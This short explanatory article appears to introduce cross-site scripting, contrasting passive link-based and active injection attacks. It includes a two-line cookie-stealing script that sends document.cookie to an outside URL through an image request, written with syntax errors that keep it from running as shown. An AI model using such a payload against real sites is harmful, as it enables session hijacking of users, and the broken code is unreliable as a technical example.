This is a type of attack that embeds a malicious code into a web system; it can cause data changes, link replacement (visible/hidden), and it can display its own ads on the affected site.
There are two types of attacks:
The passive type requires direct action from the subject of the attack. The goal of the attacker is to convince the victim to click on a malicious link, which executes the malware. This type of attack is difficult to implement because you must have not only the necessary technical skills but also the psychological knowledge.
In the active type, the hacker tries to find a vulnerability in the site’s defenses. How does this attack happen? It’s simple. The hacker formulates a combination of tags and special characters that function as a command for the website to execute. As soon as the security hole is found, a request can deploy malware, which, for example, will steal cookies and send them to any desired site. Here’s an example of a script that steals cookies from a site:
Img = new image()
Img.src = http://site.gif?+document.cookie;
Usually, it’s challenging to find a security hole within a site, since most sites have defenses that are resistant. On the other hand, humans write code for those defenses, and they tend to make mistakes.